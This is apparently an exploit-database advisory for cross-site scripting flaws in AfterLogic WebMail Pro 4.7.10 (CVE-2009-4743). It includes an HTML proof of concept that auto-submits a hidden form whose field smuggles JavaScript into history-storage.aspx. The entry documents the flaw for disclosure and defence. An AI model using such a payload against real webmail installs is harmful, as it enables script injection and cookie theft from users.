AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities

Author: Sébastien Duquette
type: webapps
platform: asp
port: 
date_added: 2009-10-06  
date_updated: 2014-05-09  
verified: 1  
codes: CVE-2009-4743;OSVDB-58712  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 33268.html  
source: https://www.securityfocus.com/bid/36605/info

AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.

AfterLogic WebMail Pro 4.7.10 and prior versions are affected.

<html> <head> </head> <body onLoad="document.form1.submit()"> <form name="form1" method="post" action="http://www.example.com/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;"> <input type="hidden" name="HistoryKey" value="value"/> <input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/> </form> </body> </html>